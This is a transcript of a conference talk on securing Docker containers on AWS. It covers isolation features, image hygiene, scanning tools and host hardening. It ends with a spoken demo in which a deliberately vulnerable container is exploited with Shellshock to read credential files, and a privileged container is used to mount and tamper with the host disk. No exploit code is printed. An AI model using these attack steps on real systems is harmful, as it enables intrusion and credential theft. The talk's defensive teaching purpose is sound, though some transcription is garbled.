AWS, Containers

Marcus Maxwell, DevOps Practitioner here at Contino, explains how to secure containers on AWS - how to put the Sec in DevOps, building secure images, ensuring the platform is safe, best practice and what happens if you ignore his advice!


I'm Marcus. What I do, I mostly deploy containers in big enterprises, on all the most weird platforms available to the world, so Oracle Private Cloud, anything on VMWare, Bare Metal, Red Hat Linux 6. I did it. It's always a lot of fun. I'm certified. If that matters to anyone. And those are my addresses where you can reach me. First question and this is a bit of a stretch. Who is using containers? Just so I kinda, know of people who have heard about containers. Just sorta like, run Docker. 

Anyone using ECS? A few people. Cool. I have a little bit of information about that. But it will be more general so it applies pretty much anywhere you're running the containers. 

So the main features of containers is pretty much boiled down to two things. So there are name spaces and there are C groups. One is for isolation, the other one is for limiting the resource use of the container. So the main one is name spaces it's been in the kernel for a very long while. So what it allows you? Essentially it allows you to emulate like a small, like if you ever use Trude you kinda experience what it is. So you can hide the hostname. You have a different hostname. You have your own pit one. You have your own file system, so you cannot access the host and its nice and isolated. So if you're running your containers in VM's. You have this additional level of security where it hides that information for you. 

Another one is C groups. And C groups are mainly for controlling the amount of CPU, memory and any other resources that containers use. So, the main like issue, let's say you're running a hosting company and you decided to run all your Apache web servers in Docker. And someone is like getting a lot of traffic. They were like on Reddit or Hacker News and someone gets smashed and all of their like, they're maxing out the CPU on the host. So if you didn't implement C groups you will be essentially using all of the host CPU and memory, you will exhaust the resources and that can be counted as a security risk. So, always use the C groups. 

Next up there are three more things depending on the OS you are running. The universal one is Seccomp. So Seccomp essentially prevents you to run some system calls against the kernel. For example, Docker by default I think there is like 400 system calls, and docker by default disables like 40 of them because they are relatively safe to turn off. So for example, if you're running containers, you're pretty sure you don't want to reboot a container from inside of a container or allow it to reboot your host. Usually that's not the use case you want. So by default those are disabled and if you really want to tweak it, there are tools that allow you to really lock it up. So it doesn't mount or modify the time on your host and doing other funky stuff.
If you're running anything from Red Hat you will have SELinux. And you will probably be running the Red Hat binary, the Red Hat package docker, which is still stuck at the 112. So you'll have that, but if you're running SELinux, I will have a demo later, and if you're running SELinux the demo will have then worked. If you're on Ubuntu, you will have AppArmor, which is a little bit more sane, some people will say. But not as hands on to prevent anything. So, the goal of essentially SELinux and AppArmor is to prevent the container to escape and do massive damage to your host. Because if someone escapes from the container that's the biggest risk you have. 

So, building secure images. A little bit regarding the life cycle and the best practices regarding the containers. The main one is to establish a standard image. One of the most common things that will go into an enterprise organization like a bank or anything else and the main thing will be they will only, either they just started their journey, or they will be a little bit somewhere in the process of like establishing an ECS, or moving to [inaudible 00:04:59] or anything in between. And the main issue is they will start using images from Docker Hub or from different places, and they will just allow them to be run on the platform. And that's the main risk because it essentially, you have your host, you have your Linux team that for a long time developed the security practices, all the checks that are required and then you have this myriad of OS's running on your host. 

So for example let's say you're at Red Hat shop. You have everything in Red Hat. You have your SELinux policies configured. You're pretty happy, no major incidents, and then someone starts running like Ubuntu 12.04 version, which is now outdated and stuff like that across everything. You start getting some bugs, then you have your help desk also very worried because they don't know how to debug a different OS issues. And then you get all these problems and you cannot track properly what's actually running on your platform. 

Another thing is when you're establishing the standard image is to have something like [inaudible 00:06:11] or Dataware, or whatever versioning policy you want. Usually the major issue is seven so it matches to your OS image, and then you have like dot releases where it's security patches and you always make sure the docker pull policy is based on that.
So, you should also make sure you have some kind of tool. Inside of ECS or Kubernetes or anything else that you are running. That checks what is actually running. So it will go and see what's the base image and if it's not what you expect then it will essentially kill that container. 

Usually when I ... this is kind of developed, you might agree, you might not. When you come into an organization and you usually will order a command especially if you're a big one because you already have an established Unix shop. You use the same OS, at least when you are starting off. Sometimes you see this mix and then, the regular Unix admins have issues picking it up and you're essentially just creating more work because there's, the difference between the Ubuntu and CentOS image is like 20 megabytes maybe in size. They are both a little bit bulky. So they're still the same. Once you have established how you like to run the containers then you should probably start optimizing into BusyBox and Alpine images once you're more proficient.

Keep your images small. One reason is mostly to reduce that type of vector. If it's not really a reason to keep the images small if you're using the same standard image with the same layers, because they won't be downloaded and between the VM's and the BareMetal. Usually the connection is so fast you don't really care. It's usually the issue if you have something like a very, like you're essentially running a VM in a container. So like I usually sometimes saw where someone will install [inaudible 00:08:24] a full GNOME desktop. They will RDP in to the container and they will work on that because the provided machines will be windows and they really wanted to have a Linux environment and essentially that creates a myriad of problems because you just installed everything on that OS.

Use a private registry, don't depend really on any external ones, Docker Hub is pretty good but again you can have the private Docker Hub if you want but usually if you're a special in AWS, use ACS it works, it's simple, it has nice security built in you need the tokens. It won't allow you to just push and pull whatever you want. If you don't do that, especially if you use all three images from like Quay or Google, you will essentially have a problem where you won't even see the Docker file. So you're essentially pulling binaries and hoping that they are secure, which is not really the best practice.

Don't embed your secrets in to images and don't embed any confidential data. Use Hashicorp Vault like Jordan explained. It integrates very nicely, it's very simple, your application should never really depend on having the secrets built in to the image. I think Daniel showed some CISecurity benchmarks, the CISecurity benchmarks are available for a myriad of products, especially there is one for docker. This is one, there's also it's provided as a bunch of shell scripts and python scripts and there's one from Docker. So this is a Docker security benchmark, I hope that's easy to see. Essentially what it does, you will almost always fail but it's okay the main thing it checks is it will show you the main issues with your Docker deployment on the VM. So it'll show you if for example you're mounting something incorrectly or your drivers are set incorrectly and your daemon essentially is badly set up. So usually if you have a failure of like 10% that's okay because if you really lock it down or you don't even allow privilege containers usually some of your monitoring and auditing tools and security tooling will essentially fail. So make sure, like understand what actually the Docker benchmark is saying to you and be careful.

A note about networking and storage. If you're really, really just starting out don't start thinking to put too much in the, don't try to run persistent containers. It's still, it's possible but you really need to have a really proper storage back end and an enterprise it will probably be just NFS. If you are on AWS you have EBS, which is amazing. So if you are on AWS yes please but really be careful what you're mounting and mostly don't allow everything to just go an create a volume and just mount a volume because you can. If it's read-only you're really limiting the attack surface is the attacker can not write or don't want any other files that will really limit the scope of what they can do.

Also set quotas because usually, especially if you build a platform and it's not like an application platform but more like a development platform for developers the main thing you will see is developers will keep running the containers, probably for a very long while and you will see that you have like this container running for a month, which you'll probably have some monitoring to detect and not allow. But if you actually want them to do that they will essentially generate so much logs that you will probably run out of storage on the thing and then you might essentially crash the full platform. I saw an entire array of NetApp almost die because a container just took up too much storage.

So networking, like the cat says you should limit what talks to [inaudible 00:12:52] you can essentially, Docker has something daemon called linking and you can also limit the containers with network policies on different network drivers. So you have calico, which allows you to set up network policies and essentially it's kind of like firewalling away your containers between each other because let's say you have 20 web servers, there is no reason web server A should talk to web server Z because they should only receive the traffic from load balancer but not between each other, right? There's no reason for them to talk. Now let's say you have a container, I usually like three tier architecture, you have a database a web server and some other things. Then let's say your database started killing your web server, when then you probably know someone is either on the database and doing something dodgy that they shouldn't be doing.

So there are a few vendor products that, so the situation sadly as it is now there is a lot of work you will have to reinvent if you try to do it yourself from scratch, especially if you're really, really in to like proper security and you want to know what's happening because it's a little bit of a black box. You can not install an agent in to a container because you're essentially blowing up the size and you should treat them really like cattle not like pets. So because you will be monitoring from the outside you have less visibility in a way, what's happening in the container. But hopefully the Docker daemon and other container D also exposes a lot of stuff that you can just listen on the socket and monitor from that side. So if you really don't want to spend too much time, especially for the basics like CICD pipeline, basic monitoring, some policies to be established. There are some products, the Sysdig Falco one is free if you want it. Aquasec and Twistlock offer enterprise products so I don't really have an opinion which one is better but they both have a similar feature.

So that's Aquasecurity essentially looks a little bit like this, sorry for the quality. Essentially you have your images and they will be scanning it against possible CVs and then they will show you, these are the high CVs, these are the medium ones and you can set policies where if there's an image with a high CV, don't allow it to be ran on the platform, if there's like 10 million CVs that's okay, if it's more don't do it because you usually can chain CVs to get a high CV right? So that's how it looks like, very nice platform, usually security people in the organization will enjoy seeing something like this.

This is Twistlock, Twistlock has a similar product, it also gives you utilizations and will also tell you what vulnerabilities you have, what compliance issues and you can see it across will give a nice map of everything. Then you have Falco and Falco essentially works a little bit like InSpec but what it allows you to say is the first example is probably the best, the other ones are quite complicated but it essentially checks for what's running in your cluster. So let's say you don't want anything to be running BASH in your containers. Nobody should be execing in to the containers and doing anything like any debugging, they should be debugging only through logs. Nobody should ever get in to the container because usually we will think it's an attacker. So you can go say BASH, check this and proc name BASH and you will see that. It's a little bit hard to configure Falco still but it's one of the best opensource tools that are still there.

The main thing that I saw recently and quite a few times now. People just move to this container world and they think I don't need to maintain my OS I can just, it's a dumb thing, it's just running containers, I really don't care what it is anymore. I don't really need all these agents I had, I really don't need to worry about it so much. The thing is, containers depend on the OS, they depend primarily on the kernel to be up to date and having other stuff like the Docker engine also up to date. If you don't do that usually you will hit those issues. So you can still use your [inaudible 00:17:57] it didn't go away anywhere, chev didn't goa way anywhere. If you still have that stuff you should just improve upon it, maybe rethink how you did it, like not have so much make it a little bit more streamlined but the OS still matters. You still have to tweak it an harden it.

So there is a nice [inaudible 00:18:18] project that I usually recommend for when I always come in to any kind of project where you go to this dev-sec Linux baseline and essentially it's like a sys benchmark of things where they check how your OS is configured and then they also provide chev [inaudible 00:18:37] playbooks, which you can run to get the OS compliant in to that state. It might not mean that you want it to be in this state because they're really tight on the security, like it prevents you to do a few things but it's a nice baseline and something to check what you're actually running there.

Don't forget your AWS account if you're running ECS or running on any other cloud platform. You still have to maintain your AWS account even if you are using ECS you should still be limiting access to the hosts, you should still have cloud watch, you should still have cloud trail, you should integrate those tools in to monitoring your containers and ensuring that's all there. If you are using ECS I think a year ago or so they announced IAM roles for tasks, which essentially allows you to have an IAM role specific to one container instead of to the full host. So that way the container will not be able to share other container's credentials, which is quite cool. So it's not really [inaudible 00:19:47] but it allows you that security.

So like Daniel mentioned the share security model is something to always keep in mind, AWS has the platform. They can, like ECS, the EC2 maintenance but they don't maintain our OS that you're running on EC2, they don't maintain your Docker images, they don't maintain your application. So you still always have to remember that, that's up to you, that's not to AWS.

So to summarize, build your own images, roll them out regularly. Usually don't run containers run longer than for a week. It's just, you might do it, there might not be much value but it sets you in the pattern of working where you always expect that you will refresh and you will be running the latest version and kind of show some failures in your system if you have to reboot the machine so you don't have this long running container because then the container slowly, the older it gets it's harder to kill. So don't do that. Keep the images minimal as possible. Don't run, don't install Htop and all of the other tooling that you think you will need one day and one day you might see that there was a vulnerability in one of those tools and that's how your container got owned.

Make sure you have some security scanning during build time and when you're running the containers. So you can use Twistlock or Aquasec or just have some other CV scanning tools like Nexus if you already have because some of the enterprise products not support that. So make sure you build that in to your CIDC pipelines. Don't forget about the OS and don't forget to maintain your AWS account with good policies. So now to a slight demo of what happens if you didn't listen to any of this advice and you didn't patch in this specific use case. I have this just to show you a slight demo of ECS, there's a single sign on, which then goes to a role in to my account, again best practice in AWS. Then I have EC2 container service and I have my cluster, it's a single node, I have this docs definition and essentially what this is, is I'm gonna demo you shell shock. I really wanted to demo the latest way Equifax was hacked if anyone was reading about that, that was the stress vulnerability but the payload to hack in to [inaudible 00:22:44] is a little bit bigger and doesn't make as a nice demo.

So this is a very simple shell shock one. So essentially what it does is, so let's run the task. This says thanks to this person, hmlio who created this. Essentially what it does, it's an Apache web server that has CGI enabled and the main difference here, like there's not special about this, it just grabs an old version of BASH, which is vulnerable to shell shock and then if you want to check what's actually happening, so there's this CGI script, which is essentially a BASH. The BASH code itself is not vulnerable right so it's all very nice and clean but because it's an old version of BASH when CGI tries to parse it and you send it to payload it essentially gets hacked. So essentially I can do this ... and as you see so let me try to make it a bit longer. So what's happening is, you have your very regular shell shock exploit here.

So this creates a kind of function that gets called and this is all that's needed to execute, to have our remote shell on the host right? So what this allows me to do now is go, let's say I want to grab past WD and that grabs me a past WD I can properly then also grab the shadow if I want, which is the more scary bit. So you grab the, yes that does work, I forgot about that. So you can grab all of this data, you can mount, you can create a remote shell if you want and essentially you have all the credentials on the host to do different things. So this is not as scary as it is, like I got shell access to the container so if I'm not running anything else vulnerable, like I didn't run the container in privilege mode then there's hard, it's a lot more difficult to escape from the container to the host still. So you have the shell access, you can probably run some mail, you can probably mine some bitcoins but just because you got the shell it didn't really do that much to you. But if you do this and you run privilege containers because you want to just mount and see the file system or let's say you were running a monitoring tool, which always require the privilege containers in them.

So let's say you do this. So if you did this then you can do a mount and you will see all the mount points and then you can see that I have this thingy here. I also have this thing, so I have dev and vme so there's a vme drive. So it has N1, P1 right? So if I'm running a privilege container that means I have pretty much full, I'm running root essentially on the host so what I can do now is I grab this, mount it in to MNT, go here and I can see my bootloader files and I can essentially modify anything I want on the host, steal all the keys, put anything malicious I want. So that's why when people say don't run privilege containers, if there's any exploit that an attacker got a shell in to your system you're going to be screwed because essentially you just gave root access and it's super easy to escape from the container in that way because in all other cases they really depend. The kernel wasn't there or the binaries weren't really mounted or something else. So make sure that the containers that you're running as privileged are really always properly monitored and there's very few of them.

Also if you're running SELinux, so this is a quite nice blog post. So if you had a bad, so this more applies to just OS security, if you were running SELinux, SELinux actually prevented shell shock. So everyone for a while had it enabled and didn't disable this thing actually was protected from shell shock. So while it might sometimes give you headaches to configure in a lot of ways they can actually prevent zero day exploits on your systems. So if you want to learn more Docker has a pretty good page about security. There's a re:invent talk that really goes more deep in to the subject and if you just want to understand what is second, what is namespaces, what are C groups and want to play around with it on the command line without any containers you can go to Julie Evan's blog and she explains what is a container essentially, what are the building blocks.

  • Marcus Maxwell


    Marcus’s passion is to help clients on their DevOps journey. From automating build pipelines and managing containers at scale to solving security issues and helping out with organizational problems.

    He tries to take a multidisciplinary approach to solving issues and always makes sure to over communicate with the client's team, so that everyone knows what the issues are at hand and how we will solve them together.

    More Articles by Marcus